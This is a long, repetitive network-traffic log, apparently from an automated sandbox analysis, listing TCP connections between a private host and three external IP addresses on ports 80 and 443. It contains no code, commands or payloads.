            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.241.153.192:80 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
